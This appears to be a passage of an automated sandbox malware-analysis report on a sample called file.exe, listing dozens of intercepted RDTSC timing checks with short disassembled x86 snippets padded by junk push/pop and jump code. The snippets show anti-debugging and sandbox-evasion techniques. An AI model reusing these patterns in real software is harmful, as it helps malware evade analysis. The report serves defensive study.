              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556950 second address: 55695A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D18D second address: 55D19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CBCE6AEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D19F second address: 55D1A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52386C second address: 5238BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F2B9CBCE6A8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 or dword ptr [ebp+122D1BA9h], ebx 0x00000029 lea eax, dword ptr [ebp+124875FCh] 0x0000002f add dword ptr [ebp+122D2B90h], edi 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 jmp 00007F2B9CBCE6B5h 0x0000003e pop edi 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5238BE second address: 50A11C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F2B9CB0EC06h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F2B9CB0EC08h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call dword ptr [ebp+122D30DEh] 0x0000002f pushad 0x00000030 jmp 00007F2B9CB0EC0Ch 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523CBE second address: 523CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523CD1 second address: 523CEC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2B9CB0EC0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jns 00007F2B9CB0EC06h 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5241DF second address: 5241E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5247E2 second address: 5247E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5248B7 second address: 5248BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524AAE second address: 524AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524AB2 second address: 524AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524AC0 second address: 524AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524C1E second address: 50AC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F2B9CBCE6B2h 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 mov di, dx 0x0000001c call dword ptr [ebp+122D3759h] 0x00000022 pushad 0x00000023 jmp 00007F2B9CBCE6B1h 0x00000028 jp 00007F2B9CBCE6A8h 0x0000002e pushad 0x0000002f popad 0x00000030 ja 00007F2B9CBCE6A8h 0x00000036 popad 0x00000037 pushad 0x00000038 pushad 0x00000039 jnl 00007F2B9CBCE6A6h 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 push eax 0x00000043 jc 00007F2B9CBCE6A6h 0x00000049 pop eax 0x0000004a push ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D47B second address: 55D4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F2B9CB0EC17h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 jno 00007F2B9CB0EC06h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D66D second address: 55D672 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D672 second address: 55D68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2B9CB0EC06h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F2B9CB0EC30h 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F2B9CB0EC06h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D68D second address: 55D691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D691 second address: 55D697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D697 second address: 55D6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D6A1 second address: 55D6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D6A5 second address: 55D6A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56308F second address: 563093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563093 second address: 563099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563099 second address: 5630B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Fh 0x00000007 jl 00007F2B9CB0EC12h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5630B2 second address: 5630B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563519 second address: 563522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563522 second address: 563528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56368C second address: 5636C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F2B9CB0EC08h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F2B9CB0EC19h 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5636C9 second address: 5636DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6ADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5639C6 second address: 563A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Fh 0x00000007 jmp 00007F2B9CB0EC12h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F2B9CB0EC06h 0x00000017 jmp 00007F2B9CB0EC11h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5683B6 second address: 5683BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5684F9 second address: 56850A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2B9CB0EC0Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56850A second address: 56852B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2B9CBCE6B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56852B second address: 568537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568537 second address: 56853D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56853D second address: 568541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568541 second address: 568563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2B9CBCE6B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5686E4 second address: 568711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2B9CB0EC1Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F2B9CB0EC06h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568D94 second address: 568DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568F2E second address: 568F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F2B9CB0EC0Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E19E second address: 56E1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57034B second address: 570367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F2B9CB0EC17h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5735E1 second address: 57363B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B6h 0x00000007 jnp 00007F2B9CBCE6BCh 0x0000000d jmp 00007F2B9CBCE6B6h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jl 00007F2B9CBCE6CEh 0x0000001a jne 00007F2B9CBCE6B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007F2B9CBCE6A6h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57363B second address: 57363F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573020 second address: 573026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573175 second address: 57317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57317D second address: 573199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573199 second address: 5731C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F2B9CB0EC17h 0x0000000d je 00007F2B9CB0EC06h 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5731C5 second address: 5731E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jc 00007F2B9CBCE6B4h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579DB1 second address: 579DBE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578B5A second address: 578B66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578CFC second address: 578D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524674 second address: 52467A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5247DA second address: 5247E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578F63 second address: 578F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F2B9CBCE6B3h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5790C1 second address: 5790D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jns 00007F2B9CB0EC06h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5790D5 second address: 5790D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579B23 second address: 579B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B431 second address: 57B437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E5C0 second address: 57E5D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E89A second address: 57E8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2B9CBCE6B3h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EB80 second address: 57EBB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2B9CB0EC17h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EBB4 second address: 57EBD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c je 00007F2B9CBCE6C7h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EBD3 second address: 57EBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58455C second address: 584560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584560 second address: 584564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584564 second address: 58456A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58456A second address: 584570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583D07 second address: 583D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F2B9CBCE6A6h 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583E59 second address: 583E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5842AB second address: 5842B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5842B1 second address: 5842B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5842B8 second address: 5842CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F2B9CBCE6A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BA62 second address: 58BA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F2B9CB0EC06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BA70 second address: 58BA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F2B9CBCE6A6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A2F8 second address: 58A302 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2B9CB0EC0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A302 second address: 58A30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A30C second address: 58A332 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2B9CB0EC06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2B9CB0EC15h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A652 second address: 58A656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A656 second address: 58A65A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A65A second address: 58A666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2B9CBCE6A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AC10 second address: 58AC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AC1A second address: 58AC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2B9CBCE6A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AEF0 second address: 58AEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2B9CB0EC06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AEFC second address: 58AF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AF07 second address: 58AF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590F7F second address: 590F89 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B9CBCE6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5940CC second address: 5940D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5940D2 second address: 5940FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jnl 00007F2B9CBCE6BCh 0x0000000f jmp 00007F2B9CBCE6B4h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5946C2 second address: 5946CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2B9CB0EC06h 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594958 second address: 594971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2B9CBCE6B4h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594971 second address: 594976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594976 second address: 594989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2B9CBCE6AAh 0x0000000e rdtsc
